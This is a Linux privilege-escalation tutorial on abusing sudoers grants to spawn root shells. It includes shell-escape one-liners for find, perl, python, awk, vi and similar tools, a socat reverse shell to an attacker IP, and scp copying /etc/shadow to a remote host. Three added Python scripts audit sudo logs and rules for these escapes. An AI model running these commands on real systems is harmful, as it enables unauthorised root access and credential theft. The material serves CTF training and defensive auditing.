Abusing Sudo

This document discusses how to escalate privileges on a Linux system by configuring sudo permissions in the /etc/sudoers file. It provides examples of granting a user sudo access to specific commands like find, binary programs like perl and python, and assigning root privileges to allow executing commands as the root user without authentication. It then demonstrates how these sudo permissions can be exploited to spawn interactive root shells using those given commands.


Contents

Introduction ........................................................................................... 3
Sudoer File Syntax .................................................................................. 4
Traditional Method to assign Root Privilege ......................................... 5
Spawn Root Access ................................................................................. 6
Default Method to assign Root Privilege ............................................... 7
Spawn Root Access ................................................................................. 8
Allow Root Privilege to Binary commands............................................. 9
Spawn Root Access using Find Command ............................................ 10
Allow Root Privilege to Binary Programs ............................................. 11
Spawn shell using Perl .......................................................................... 11
Spawn shell using Python..................................................................... 12
Spawn shell using Less Command ........................................................ 12
Spawn shell using AWK ........................................................................ 13
Spawn shell using Man Command (Manual page)............................... 14
Spawn shell using Vi-editor (Visual editor) .......................................... 15
Allow Root Privilege to Shell Script ...................................................... 17
Spawn root shell by Executing Bash script ........................................... 19
Spawn root shell by Executing Python script ....................................... 19
Spawn root shell by Executing C Language script ................................ 20
Allow Sudo Right to other Programs ................................................... 20
Spawn Shell Using Env ......................................................................... 21
Spawn Shell Using FTP.......................................................................... 22
Spawn Shell Using Socat ...................................................................... 22
Spawn shell through SCP ...................................................................... 23

Introduction
We have already covered Linux privilege escalation through SUID binaries and through the /etc/passwd file;
today we talk about "Linux Privilege Escalation using the Sudoers file." While working on CTF challenges
for privilege escalation, we always check which files or commands the current user may run with root
rights by using the sudo -l command. Here you can see how we used this approach for privilege escalation.

The sudoers file in /etc is the configuration file for sudo rights on Linux and Unix. We have all heard of
the sudo command, whose name is short for "superuser do": it runs a task with root privileges. The sudoers
file lists the users and groups that have root capabilities and may run some or all commands as root or as
another user. Take a look at the image below.

When you use sudo to run a command that requires root capabilities, sudo checks the sudoers file for that
specific account and decides whether the user is listed there; if not, you cannot use sudo to launch the
command or program. Under the default sudoers policy, the root user can perform ALL commands from ALL
hosts while acting as ALL users in ALL groups.

Sudoer File Syntax
If you (the root user) want to grant sudo access to a specific user, use the visudo command to edit the
sudoers file. Under "User privilege specification" you will see the usual root entry "root ALL=(ALL:ALL)
ALL"; an entry may also carry an optional Tag, as shown in the image below.
Consider the example in which we want to give user raaz sudo rights to open a terminal and run the copy
command with root privileges. Here the NOPASSWD tag means that no password will be requested from the
user.
NOTE:

1. (ALL:ALL) can also be written as (ALL).

2. If you find (root) in place of (ALL:ALL), it means that the user can run the command as root.

3. If no user/group is given in parentheses, sudo defaults to the root user.

Let’s Begin!!
Let’s get into the practical work. First, create a user that is not a member of the sudo group. We have
added the user "raaz", whose UID is 1002 and GID is 1002, making raaz a non-root user.

adduser raaz

Traditional Method to assign Root Privilege
If the system administrator wants to grant all permissions to user raaz, he can do so by adding user raaz
to the User Privilege Specification category as shown below.

visudo
raaz ALL=(ALL:ALL) ALL
or
raaz ALL=(ALL) ALL

Spawn Root Access
On the other side, start your attacking machine, first compromise the target system, and then move to
the privilege escalation phase. Suppose you have successfully logged into the victim’s machine through SSH
and want to know the sudo rights of the current user; then execute the commands below. In the traditional
method the PASSWD option is in effect, so the user is asked for a password while running these commands;
it can be disabled with the NOPASSWD tag. The highlighted text indicates that the current user is
authorized to execute all commands. Therefore, we obtained root access by executing sudo su.

ssh [email protected]
sudo -l
sudo su
id

Default Method to assign Root Privilege
If the system administrator wants to give root permission to user raaz to execute all commands and
programs, then he can follow the below steps to add user raaz under the User Privilege Specification
category.

visudo
raaz ALL=ALL
or
raaz ALL=(root) ALL

Here too, the default PASSWD option is in effect, so a password is required for authentication.

Spawn Root Access
Again, compromise the target system and then move to the privilege escalation stage as done above, and
execute the below command to view the sudo user list.

ssh [email protected]
sudo -l

The highlighted text indicates that user raaz can run all commands as the root user. Therefore, we can
obtain root access by performing the further steps.

sudo su
or
sudo bash

Note: Both of the methods above ask for the user’s password when the sudo -l command is executed,
because the PASSWD option is in effect by default.

Allow Root Privilege to Binary commands
The user may be given permission to run a specific file or command, such as /bin/cp, /bin/cat or
/usr/bin/find. This kind of permission can lead to privilege escalation to root, and it is set up with an
entry like the one below:

raaz ALL=(root) NOPASSWD: /usr/bin/find

NOTE: Here the NOPASSWD tag means that no password will be requested for authentication when running
the sudo -l command.

Spawn Root Access using Find Command
Again, compromise the victim’s system, move to the privilege escalation phase and execute the below
command to view the sudo user list.

sudo -l

At this point you can see that the highlighted text indicates that user raaz can run any command through
the find command (its -exec action). Therefore, we got root access by executing the below commands.

sudo find /home -exec /bin/bash \;
id

Allow Root Privilege to Binary Programs
Sometimes admins grant a particular user the delicate authority to run binary programs that allow the
user to edit any system file, such as /etc/passwd. Certain binary programs lead to privilege escalation
when a user is authorized to run them. In the command given below, we have assigned sudo rights to the
following programs, which can then be run as the root user.

raaz ALL=(root) NOPASSWD: /usr/bin/perl, /usr/bin/python, /usr/bin/less, /usr/bin/awk, /usr/bin/man, /usr/bin/vi

Spawn shell using Perl

During the privilege escalation phase, execute the below command to view the sudo user list.

sudo -l

The highlighted text now indicates that user raaz can run Perl programs or scripts as the root user.
Therefore, we got root access by executing a Perl one-liner.

sudo perl -e 'exec "/bin/bash";'
id

Spawn shell using Python

After compromising the target system, move to the privilege escalation phase as done above and execute
the below command to view the sudo user list.

sudo -l

At this point you can see that the highlighted text indicates that user raaz can run Python programs or
scripts as the root user. Thus, we acquired root access by executing a Python one-liner.

sudo python -c 'import pty;pty.spawn("/bin/bash")'
id

Spawn shell using Less Command

During the privilege escalation phase, execute the below command to view the sudo user list.

sudo -l

Here you can observe the highlighted text, which indicates that user raaz can run the less command as
root. Hence, we obtained root access by executing the following.

sudo less /etc/hosts
id

It opens the requested system file in the less pager; to spawn a root shell, type !bash as shown below
and hit Enter.
You will get root access as shown in the below image.

Spawn shell using AWK

After compromising the target system, move to the privilege escalation phase as done above and execute
the below command to view the sudo user list.

sudo -l

At this point you will notice that the highlighted text indicates that user raaz can run an AWK program
or script as root. Therefore, we obtained root access by executing an AWK one-liner.

sudo awk 'BEGIN {system("/bin/bash")}'
id

Spawn shell using Man Command (Manual page)
For privilege escalation, execute the below command to view the sudo user list.

sudo -l

The highlighted text indicates that user raaz can run the man command as root. Therefore, we got root
access by executing the following.

sudo man man

It displays the Linux manual page; to spawn a root shell, type !bash as presented below and hit Enter,
and you get root access as done above with the less command.

You will get root access as shown in the below image.

id
whoami

Spawn shell using Vi-editor (Visual editor)


After compromising the target system, move to the privilege escalation phase as done above and execute
the below command to view the sudo user list.

sudo -l

Here you can observe the highlighted text, which indicates that user raaz can run the vi command as root
user. Consequently, we got root access by executing the following.

sudo vi

It opens the vi editor; to spawn a root shell, type !bash as shown below and hit Enter, and you get root
access as done above with the less command.

You will get root access as shown in the below image.

sudo vi
id
whoami

NOTE: sudo permission for less, nano, man and vi is very dangerous, as these programs let the user escape
to a shell or edit system files, which leads to privilege escalation.
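Every escape in this and the preceding sections begins with one sudo invocation, and that invocation is the only thing sudo writes to the log: the !bash typed inside less, man or vi is a child of the pager and never appears as a separate sudo log line. The Python script below is an added example, not part of the original article, that scans syslog-style sudo lines and rates each one. The log lines are constructed in the default sudo syslog format (not real captures), and the list of escapable binaries is the one this article covers.

```python
"""Scan sudo syslog lines for invocations that can end in a root shell (added example)."""
import os
import re
import shlex

# Programs this article shows being abused to spawn a root shell when run via sudo.
SHELL_ESCAPE_BINARIES = {
    "find", "perl", "python", "less", "awk", "man", "vi", "nano",
    "env", "ftp", "socat", "scp",
}

# Default sudo syslog format, e.g.
#   sudo:     raaz : TTY=pts/0 ; PWD=/home/raaz ; USER=root ; COMMAND=/usr/bin/less /etc/hosts
# A refusal inserts its reason before TTY= ("command not allowed ;", "user NOT in sudoers ;").
SUDO_LOG_RE = re.compile(
    r"sudo:\s+(?P<user>[^\s:]+)\s+:\s+(?P<body>.*?)"
    r"USER=(?P<runas>\S+)\s*;\s*COMMAND=(?P<command>.*)$"
)
# A shell named somewhere in the arguments: /bin/bash, sh -li, exec:sh, ...
SHELL_RE = re.compile(r"(^|[/:=\s'\"])(ba|z|da)?sh\b")


def parse_sudo_line(line):
    """Return the fields of one sudo log line, or None for unrelated lines."""
    m = SUDO_LOG_RE.search(line)
    if not m:
        return None
    body = m.group("body")
    return {
        "user": m.group("user"),
        "runas": m.group("runas"),
        "command": m.group("command").strip(),
        "denied": "NOT in sudoers" in body or "command not allowed" in body,
    }


def base_program(command):
    """Split COMMAND= into (program name, args); '/usr/bin/python3.10' -> 'python'."""
    try:
        argv = shlex.split(command)
    except ValueError:          # unbalanced quotes in a logged argument
        argv = command.split()
    if not argv:
        return "", []
    name = os.path.basename(argv[0])
    return re.sub(r"[\d.]+$", "", name), argv[1:]


def classify(event):
    """Rate one parsed sudo event; returns (severity, reason)."""
    if event["denied"]:
        return "medium", "sudo refused the command: policy probe or misuse attempt"
    if event["command"] == "list":
        return "info", "sudo -l: user enumerated their own sudo rights"
    program, args = base_program(event["command"])
    shell_in_args = any(SHELL_RE.search(a) for a in args)
    if program in SHELL_ESCAPE_BINARIES and shell_in_args:
        return "critical", f"{program} run as {event['runas']} with a shell in its arguments"
    if program in SHELL_ESCAPE_BINARIES:
        # Interactive escapes (!bash inside less, man or vi) produce no sudo log line of
        # their own: the shell is a child of the pager, so the binary alone is the signal.
        return "high", f"{program} can escape to a shell; the escape itself is never logged"
    if shell_in_args:
        return "high", "shell named in the arguments of a sudo-allowed command"
    return "low", "allowed command with no shell indicators"


def scan(lines):
    """Parse and classify every sudo line in an iterable of syslog lines."""
    findings = []
    for line in lines:
        event = parse_sudo_line(line)
        if event is not None:
            severity, reason = classify(event)
            findings.append({**event, "severity": severity, "reason": reason})
    return findings


# Constructed sample lines in the default sudo syslog format (not real captures).
SAMPLE_LOG = r"""
Apr 12 10:01:02 victim sudo:     raaz : TTY=pts/0 ; PWD=/home/raaz ; USER=root ; COMMAND=list
Apr 12 10:01:10 victim sudo:     raaz : TTY=pts/0 ; PWD=/home/raaz ; USER=root ; COMMAND=/usr/bin/find /home -exec /bin/bash \;
Apr 12 10:02:33 victim sudo:     raaz : TTY=pts/0 ; PWD=/home/raaz ; USER=root ; COMMAND=/usr/bin/less /etc/hosts
Apr 12 10:03:01 victim sudo:     raaz : TTY=pts/0 ; PWD=/home/raaz ; USER=root ; COMMAND=/bin/cp /tmp/notes /tmp/notes.bak
Apr 12 10:04:00 victim sudo:      bob : command not allowed ; TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/bin/cat /etc/shadow
Apr 12 10:04:30 victim sshd[2211]: Accepted password for raaz from 192.0.2.10 port 50122 ssh2
""".strip().splitlines()

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']:8}] {f['user']} -> {f['runas']}: {f['command']}  ({f['reason']})")
```

Run it against /var/log/auth.log (or `journalctl -t sudo`) instead of SAMPLE_LOG to get the same rating on real events. Because the pager escapes leave no trace of their own, the "high" rating on a bare `less` or `man` invocation is deliberate: the rule that allowed it, not the log, is what needs fixing.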

Allow Root Privilege to Shell Script
There is a good chance of finding scripts on a system that are invoked by the system or by another
program. They can be Bash, PHP, Python or C programs. Suppose you (the system admin) want to give sudo
permission to a script that provides a bash shell on execution.
For example, we have some scripts that provide a root terminal on execution. In the image given below,
you can observe that we have written three programs for obtaining a bash shell in different programming
languages and saved all three files, asroot.py, asroot.sh and asroot.c (compiled to the file shell),
inside /bin/script.
NOTE: While solving OSCP challenges, you will find that some authors hide scripts that exploit the kernel
or spawn a root shell, and grant sudo permission to a particular user to execute that script.

cat asroot.py
cat asroot.sh
cat asroot.c
gcc asroot.c -o shell
chmod 777 shell
ls

Now allow raaz to run all the above scripts as the root user by adding the following entry to the sudoers
file.

raaz ALL=(root) NOPASSWD: /bin/script/asroot.sh, /bin/script/asroot.py, /bin/script/shell
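The chmod 777 shell step above makes the compiled program world-writable, which is a misconfiguration on its own: anyone who can write to a file that sudo lets raaz run as root can replace its contents, so the rule is only as strong as the permissions on the file and its directory. The following Python script is an added example (not from the article) that checks ownership and write bits for each sudo-allowed command path and its parent directory. It builds its own temporary stand-in for /bin/script rather than touching real system paths, and /bin/script/missing is a placeholder path.

```python
"""Check that commands granted via sudo cannot be rewritten by the users who may run them (added example)."""
import os
import stat
import tempfile

CURRENT_UID = os.getuid()
OTHERS_WRITE = stat.S_IWGRP | stat.S_IWOTH


def audit_command_path(path, trusted_owner=0):
    """Return a list of problems for one command path that sudo allows a user to run.

    If the grantee (or anyone else) can write the file, or swap it inside its
    directory, the sudo rule is effectively a root shell. trusted_owner is the
    uid allowed to own the file; on a real host that is root (0).
    """
    problems = []
    if not os.path.lexists(path):
        return [f"{path}: does not exist (stale rule)"]
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        problems.append(f"{path}: is a symlink; audit its target as well")
        try:
            st = os.stat(path)
        except FileNotFoundError:
            return problems + [f"{path}: dangling symlink"]
    if st.st_uid != trusted_owner:
        problems.append(f"{path}: owned by uid {st.st_uid}, not {trusted_owner}; the owner can replace it")
    if st.st_mode & OTHERS_WRITE:
        problems.append(f"{path}: group/world-writable (mode {oct(st.st_mode & 0o777)}); "
                        "anyone with write access can plant code")
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    if pst.st_mode & OTHERS_WRITE and not pst.st_mode & stat.S_ISVTX:
        problems.append(f"{parent}: directory writable by others without the sticky bit; "
                        "the file can be swapped")
    return problems


def audit_paths(paths, trusted_owner=0):
    """Audit several paths; returns {path: [problems]} for the problematic ones only."""
    result = {}
    for p in paths:
        problems = audit_command_path(p, trusted_owner)
        if problems:
            result[p] = problems
    return result


def make_demo_tree():
    """Build a constructed stand-in for /bin/script: one safe script and one chmod 777 file."""
    root = tempfile.mkdtemp(prefix="sudo-audit-")   # created 0700, so the directory itself is fine
    safe = os.path.join(root, "asroot.sh")
    loose = os.path.join(root, "shell")
    for p in (safe, loose):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
    os.chmod(safe, 0o755)
    os.chmod(loose, 0o777)   # mirrors the article's `chmod 777 shell`
    return safe, loose


if __name__ == "__main__":
    safe, loose = make_demo_tree()
    # The demo files belong to the current user, so pass that uid as the trusted owner;
    # on a real host keep the default (root). "/bin/script/missing" is a placeholder path.
    report = audit_paths([safe, loose, "/bin/script/missing"], trusted_owner=CURRENT_UID)
    for path, problems in report.items():
        for problem in problems:
            print(problem)
```

Feed it the command paths from your own sudoers rules (with the default trusted owner of root) and fix anything it reports before worrying about the rules themselves: a root-owned, mode 0755 file in a root-owned directory is the minimum for a sudo target.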

Spawn root shell by Executing Bash script
During the privilege escalation phase, execute the below command to view the sudo user list.

sudo -l

The highlighted text indicates that user raaz can run asroot.sh as the root user. Therefore, we got root
access by running the asroot.sh script.

sudo /bin/script/asroot.sh
id

Spawn root shell by Executing Python script


Execute the below command for privilege escalation to view the sudo user list.

sudo -l

At this time, the highlighted text shows that user raaz can run asroot.py as the root user. Therefore, we
acquired root access by executing the following script.

sudo /bin/script/asroot.py
id

Spawn root shell by Executing C Language script


After compromising the target system, move to privilege escalation and execute the below command to
view the sudo user list.

sudo -l

Here you can see that the highlighted text indicates that user raaz can run shell (the compiled asroot.c
file) as the root user. So, we obtained root access by executing the following:

sudo /bin/script/shell
id

Allow Sudo Right to other Programs

As we have seen above, some binary programs with sudo rights help in getting root access. Apart from
those, some applications can also provide root access when they carry sudo privilege, such as FTP or
Socat. In the command given below, we have assigned sudo rights to the following programs, which can be
run as the root user.

raaz ALL=(ALL) NOPASSWD: /usr/bin/env, /usr/bin/ftp, /usr/bin/scp, /usr/bin/socat
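To tie the syntax from the "Sudoer File Syntax" section to the grants shown in "Allow Root Privilege to Binary commands", "Allow Root Privilege to Binary Programs" and this section, the following Python script is an added example (not part of the article) that parses sudoers user-specification lines, applies the three NOTE rules ((ALL:ALL) equals (ALL), (root) means run as root, and no parentheses defaults to root), tracks the tags that prefix each command, and flags every command this article shows escaping to a root shell. The sample sudoers text is constructed from the article's own entries plus two contrasting lines; the NOEXEC handling relies on sudo's documented NOEXEC tag.

```python
"""Parse /etc/sudoers user specifications and flag grants that lead to a root shell (added example)."""
import os
import re

# Programs this article shows being escaped to a root shell when allowed via sudo.
SHELL_ESCAPE_BINARIES = {
    "find", "perl", "python", "less", "awk", "man", "vi", "nano",
    "env", "ftp", "socat", "scp",
}
# Tags that may prefix a command; a tag stays in effect for the rest of the
# command list on that line until its opposite overrides it.
OPPOSITE = {"NOPASSWD": "PASSWD", "PASSWD": "NOPASSWD", "NOEXEC": "EXEC",
            "EXEC": "NOEXEC", "SETENV": "NOSETENV", "NOSETENV": "SETENV"}
TAG_RE = re.compile(r"^(%s):\s*" % "|".join(OPPOSITE))
SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias", "@include")
# user  host=(runas_user[:runas_group])  [TAG:] command[, [TAG:] command ...]
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")


def parse_runas(runas):
    """(ALL:ALL) and (ALL) both allow any target user; no parentheses at all means root."""
    if runas is None:
        return "root", None
    user, _, group = runas.partition(":")
    # "(:group)" leaves the user part empty: sudo then runs as the invoking user.
    return user.strip() or None, group.strip() or None


def parse_spec(line):
    """Parse one user specification; returns None for blanks, comments, Defaults and aliases."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(SKIP):
        return None
    m = SPEC_RE.match(line)
    if not m:
        return None
    runas_user, runas_group = parse_runas(m.group("runas"))
    commands, tags = [], set()
    for item in m.group("rest").split(","):
        item = item.strip()
        while (tag := TAG_RE.match(item)):
            tags.discard(OPPOSITE[tag.group(1)])
            tags.add(tag.group(1))
            item = item[tag.end():]
        if item:
            commands.append({"command": item, "tags": sorted(tags)})
    return {"user": m.group("user"), "host": m.group("host"), "runas_user": runas_user,
            "runas_group": runas_group, "commands": commands}


def audit_spec(spec):
    """Findings for one parsed specification; the stock root line is expected and skipped."""
    findings = []
    if spec is None or spec["user"] == "root":
        return findings
    runas = spec["runas_user"] or "the invoking user"
    for entry in spec["commands"]:
        cmd, tags = entry["command"], entry["tags"]
        program = re.sub(r"[\d.]+$", "", os.path.basename(cmd.split()[0]))
        if cmd == "ALL":
            severity = "critical" if runas in ("root", "ALL") else "high"
            reason = f"may run ALL commands as {runas}"
        elif program in SHELL_ESCAPE_BINARIES and "NOEXEC" in tags:
            severity = "medium"
            reason = f"{program} can escape to a shell, but NOEXEC blocks exec() from dynamically linked programs"
        elif program in SHELL_ESCAPE_BINARIES:
            severity = "critical" if "NOPASSWD" in tags else "high"
            reason = f"{program} can escape to a shell running as {runas}"
        else:
            continue   # fixed-argument or non-escapable command: not flagged here
        if "NOPASSWD" in tags:
            reason += " (NOPASSWD: no password prompt)"
        findings.append({"user": spec["user"], "command": cmd, "severity": severity, "reason": reason})
    return findings


def audit_sudoers(text):
    """Audit every line of a sudoers file and return the list of findings."""
    findings = []
    for line in text.splitlines():
        findings.extend(audit_spec(parse_spec(line)))
    return findings


# Constructed sample sudoers content assembled from the grants shown in this article.
SAMPLE_SUDOERS = """
root    ALL=(ALL:ALL) ALL
raaz    ALL=(ALL:ALL) ALL
raaz    ALL=(root) NOPASSWD: /usr/bin/find
raaz    ALL= (root) NOPASSWD: /usr/bin/perl, /usr/bin/python, /usr/bin/less, /usr/bin/awk, /usr/bin/man, /usr/bin/vi
raaz    ALL=(ALL) NOPASSWD: /usr/bin/env, /usr/bin/ftp, /usr/bin/scp, /usr/bin/socat
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/data/ /mnt/backup/   # fixed arguments
ops     ALL=(root) NOEXEC: /usr/bin/less /var/log/syslog
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f['severity']:8}] {f['user']}: {f['command']}  ({f['reason']})")
```

The two extra lines show the safer shapes: the backup rule pins every argument, so rsync cannot be pointed anywhere else, and the ops rule keeps less usable while NOEXEC stops it from launching a shell. Run the script over the output of visudo -c -f or the files under /etc/sudoers.d to find entries of the kind this article abuses.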

Spawn Shell Using Env

During the privilege escalation phase, execute the below command to view the sudo user list.

sudo -l

As we can observe, user raaz has sudo rights for env, FTP, SCP and Socat. Let’s try to get root access
through them one by one.

sudo env /bin/bash
whoami

Spawn Shell Using FTP
Now let’s try to get root access through FTP with the help of the following commands. At the ftp> prompt,
! on its own drops to a local shell, and ! /bin/sh runs the named shell:

sudo ftp
whoami
or
! /bin/sh
id
whoami

Spawn Shell Using Socat

Now let’s try to get root access through socat with the help of the following commands. Execute the below
command on the attacker’s terminal to start a listener for the reverse connection.

socat file:`tty`,raw,echo=0 tcp-listen:1234
whoami

Then run the following command on the victim’s machine, and you will get root access on your attacker
machine.

sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234

Spawn shell through SCP
As we know, sudo right is available for SCP, but it is not possible to get a bash shell directly as shown
above, because SCP is a means of securely moving files between a local host and a remote host.
Therefore, we can use it to transfer those system files which require root permission for read and write
operations, such as the /etc/passwd and /etc/shadow files.
Syntax: scp SourceFile user@host:~/path/to/directory

sudo scp /etc/passwd [email protected]:~/


sudo scp /etc/shadow [email protected]:~/

Now let’s confirm the transfer by inspecting the remote directory; as you can observe, we have
successfully received the passwd and shadow files on our remote PC.

ls
cat shadow

www.ignitetechnologies.in
